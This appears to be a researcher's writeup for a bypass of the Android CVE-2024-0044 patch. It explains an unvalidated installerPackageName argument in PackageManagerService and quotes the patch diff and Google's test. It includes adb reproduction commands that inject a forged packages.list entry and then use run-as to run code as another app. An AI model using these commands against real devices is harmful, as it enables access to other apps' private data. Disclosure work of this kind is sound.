CVE-2024-0044/A-307532206 is a High severity vulnerability in the Android framework that allows attackers with adb access to run arbitrary code under the UID of arbitrary app. It was originally found by Tom Hebb from Meta Red Team X. You can found many articles on exploit this vulnerability on the Internet such as this and this. For more info, check this blog:
The patch for this vulnerability is included in the March 2024 Android Security Bulletin, but now I come up with an exploit that bypasses the patch. The new patch is included in October 2024 Android Security Bulletin under the same CVE ID CVE-2024-0044. Android 12-13 devices with security patch level before 2024-10-01 are vulnerable to this issue.
This repo contains a minimum reproducible PoC and a writeup.
The patch added a validation for installer package name passed to the PackageManagerService:
diff --git a/services/core/java/com/android/server/pm/ b/services/core/java/com/android/server/pm/
index 2ca3e8f..02515cf 100644
--- a/services/core/java/com/android/server/pm/
+++ b/services/core/java/com/android/server/pm/
@@ -47,6 +47,7 @@
import android.os.Binder;
@@ -601,17 +602,22 @@
// App package name and label length is restricted so that really long strings aren't
// written to disk.
- if (params.appPackageName != null
- && params.appPackageName.length() > SessionParams.MAX_PACKAGE_NAME_LENGTH) {
+ if (params.appPackageName != null && !isValidPackageName(params.appPackageName)) {
params.appPackageName = null;
params.appLabel = TextUtils.trimToSize(params.appLabel,
- String requestedInstallerPackageName = (params.installerPackageName != null
- && params.installerPackageName.length() < SessionParams.MAX_PACKAGE_NAME_LENGTH)
- ? params.installerPackageName : installerPackageName;
+ // Validate installer package name.
+ if (params.installerPackageName != null && !isValidPackageName(
+ params.installerPackageName)) {
+ params.installerPackageName = null;
+ }
+ String requestedInstallerPackageName =
+ params.installerPackageName != null ? params.installerPackageName
+ : installerPackageName;
if ((callingUid == Process.SHELL_UID) || (callingUid == Process.ROOT_UID)) {
params.installFlags |= PackageManager.INSTALL_FROM_ADB;
@@ -935,6 +941,19 @@
throw new IllegalStateException("Failed to allocate session ID");
+ private static boolean isValidPackageName(@NonNull String packageName) {
+ if (packageName.length() > SessionParams.MAX_PACKAGE_NAME_LENGTH) {
+ return false;
+ }
+ // "android" is a valid package name
+ String errorMessage = ParsingPackageUtils.validateName(
+ packageName, /* requireSeparator= */ false, /* requireFilename */ true);
+ if (errorMessage != null) {
+ return false;
+ }
+ return true;
+ }
You can see params.installerPackageName
will be reset to null if it is not an legal Android package name. However, at the next line, requestedInstallerPackageName
can be installerPackageName
when params.installerPackageName
is null or invalid.
What is installerPackageName
Let's take a look at the createSessionInternal
method, where the patch was added to:
public int createSession(SessionParams params, String installerPackageName,
String callingAttributionTag, int userId) {
try {
return createSessionInternal(params, installerPackageName, callingAttributionTag,
} catch (IOException e) {
throw ExceptionUtils.wrap(e);
private int createSessionInternal(SessionParams params, String installerPackageName,
String installerAttributionTag, int userId)
throws IOException{
You can see that installerPackageName
is a separate argument that does not come from param
. The original patch validated params.installerPackageName
, but forgot to validate installerPackageName
You can just use the original exploit code from Tom Hebb's blog to reproduce it. This repo also contains a minimum reproducible PoC. If you want to test my PoC, just build it, push the generated apk to /data/local/tmp/poc.apk
, then run the following code with adb shell
victim <victim uid> 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
app_process -Djava.class.path=$APK /system/bin top.canyie.cve_2024_0044.PoC "$APK" "$PAYLOAD"
run-as victim
replace <victim uid>
with the UID of the victim app.
If you want to play the game again, run adb uninstall top.canyie.cve_2024_0044
and re-run the code above.
The issue looks obvious, how did it escape everyone's sight?
Well, Google did add a test for this issue to ensure it is fixed:
// Set vulnerable 'appPackageName' and 'installerPackageName'
// for 'SessionParams' instance
final String vulnPackageName =
context.getPackageName() + "\n" + context.getPackageName();
final SessionParams params = new SessionParams(MODE_FULL_INSTALL);
final List<String> vulnerableFields = new ArrayList<String>();
() -> {
// Create session using 'SessionParams' instance, get 'appPackageName' and
// 'installerPackageName' corresponding to session and abandon session later
final PackageInstaller packageInstaller =
final int sessionId = packageInstaller.createSession(params);
final String vulnerableAppPackageName =
final String vulnerableInstallerPackageName =
// Without fix, 'appPackageName' and 'installerPackageName' does not undergo
// internal validation and are set to 'vulnPackageName' which contain '\n'
if (vulnerableAppPackageName != null
&& vulnerableAppPackageName.contains("\n")) {
if (vulnerableInstallerPackageName != null
&& vulnerableInstallerPackageName.contains("\n")) {
String errorMessage =
"Device is vulnerable to b/307532206 !!"
+ " packages.list newline injection allows"
+ " run-as as any app from ADB"
+ " Due to : Fix is not present for ";
assertWithMessage(errorMessage.concat(String.join(" , ", vulnerableFields)))
The test uses the public standard PackageInstaller API which does not allow customizing installerPackageName
. In the public API, installerPackageName
is always set to the real package name of provided Context:
public int createSession(@NonNull SessionParams params) throws IOException {
try {
return mInstaller.createSession(params, mInstallerPackageName, mAttributionTag,
} catch (RuntimeException e) {
throw e;
} catch (RemoteException e) {
throw e.rethrowFromSystemServer();
When the caller is a 3rd-party app, installerPackageName
is guaranteed to belong to the caller; when the caller is adb, it will always be reset to null, so this seems fine:
String requestedInstallerPackageName =
params.installerPackageName != null ? params.installerPackageName
: installerPackageName;
if ((callingUid == Process.SHELL_UID) || (callingUid == Process.ROOT_UID)) {
params.installFlags |= PackageManager.INSTALL_FROM_ADB;
// adb installs can override the installingPackageName, but not the
// initiatingPackageName
installerPackageName = null;
} else {
if (callingUid != Process.SYSTEM_UID) {
// The supplied installerPackageName must always belong to the calling app.
mAppOps.checkPackage(callingUid, installerPackageName);
// Only apps with INSTALL_PACKAGES are allowed to set an installer that is not the
// caller.
if (!TextUtils.equals(requestedInstallerPackageName, installerPackageName)) {
if (mContext.checkCallingOrSelfPermission(Manifest.permission.INSTALL_PACKAGES)
!= PackageManager.PERMISSION_GRANTED) {
mAppOps.checkPackage(callingUid, requestedInstallerPackageName);
However, the operation occurs after requestedInstallerPackageName
is set to installerPackageName
, so the original value is kept.
But if they run the original PoC provided by Tom Hebb instead of writing their own, they can catch the problem as the pm command calls the underlying createSession
method with customized installerPackageName
One more question, why the problem isn't caught by someone else while the PoC is publicly accessible?
Well, this vulnerability has been analyzed, reproduced and exploited by many people on the Internet, and there is an article written by Qidan He (flanker) of JD Dawn Security Lab (this is a very interesting article about CVE-2024-31317 btw) that says "其中CVE-2024-0044因简单直接,在技术社区已经有了广泛的分析和公开的exp" ("CVE-2024-0044 has been widely analyzed and publicly exploited in the technical community because it is simple and direct"), however no one noticed it as if every one were under a spell.
In fact, someone has successfully reproduced the exploit on patched builds, but the author doesn't seem to realize what happened. I found it by a code review and reported it on May 16, 2024, 2 months after the original patch was released. If anyone before me would have taken a few extra seconds to carefully look at the patch, or just try running the PoC on patched builds to see whether the issue is actually fixed, the bug bounty would have been theirs. This sounds like a Chinese lyric, “再多看一眼就会爆炸”("One more look and it will explode").